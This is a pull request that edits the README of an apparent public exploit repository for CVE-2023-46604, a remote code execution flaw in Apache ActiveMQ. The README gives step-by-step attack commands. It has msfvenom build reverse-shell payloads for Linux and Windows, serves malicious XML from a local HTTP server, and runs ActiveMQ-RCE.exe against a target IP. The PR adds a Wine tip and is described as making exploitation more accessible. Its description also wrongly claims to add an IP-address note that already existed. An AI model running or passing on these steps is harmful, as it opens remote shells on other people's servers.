### PR TITLE
Update README: Add Wine Usage for Linux/Unix Targets

### DIFF
--- a/README.md
+++ b/README.md
@@ -4,13 +4,15 @@ This exploit builds upon the foundational work available at https://github.com/X
 # Usage:
 <b>Important: Manually change the IP Address (0.0.0.0 on line 11) in the XML files with the IP Address where the payload will be generated. If u follow the below commands it will be your Listner IP Addess. Also {IP_Of_Hosted_XML_File} will be your Listner IP Address.</b>
 
+Additionally, consider downloading [Wine](https://github.com/wine-mirror/wine) to run the `.exe` file `ActiveMQ-RCE.exe`.
+
 For Linux/Unix Targets
 ```
 git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
 cd CVE-2023-46604-RCE-Reverse-Shell
 msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
 python3 -m http.server 8001
-./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
+./ActiveMQ-RCE.exe -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
 ```
 
 For Windows Targets
@@ -19,7 +21,7 @@ git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
 cd CVE-2023-46604-RCE-Reverse-Shell
 msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
 python3 -m http.server 8001
-./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml
+./ActiveMQ-RCE.exe -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml
 ```
 
 ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/db1b82e4-55ef-4f23-9df7-8a0cf99c01c4)


### PR DESCRIPTION
This commit introduces a significant update to the README.md file, specifically in the "Usage" section for Linux/Unix targets. The key change involves the recommendation to download and use Wine (https://github.com/wine-mirror/wine), a compatibility layer capable of running Windows applications on POSIX-compliant operating systems. This addition is meant to facilitate the execution of the 'ActiveMQ-RCE.exe' file on Linux/Unix systems.

Changes made:
1. Added a brief note under the "Usage" section, highlighting the need to manually change the IP address in the XML files.
2. Included a recommendation to download Wine for running the 'ActiveMQ-RCE.exe' file on Linux/Unix systems.
3. Modified the Linux/Unix target instructions to use 'ActiveMQ-RCE.exe' instead of the previous script.

This update aims to enhance user experience by providing clear instructions for Linux/Unix users who need to run an EXE file, ensuring a smoother and more accessible exploitation process for those operating in a Linux/Unix environment.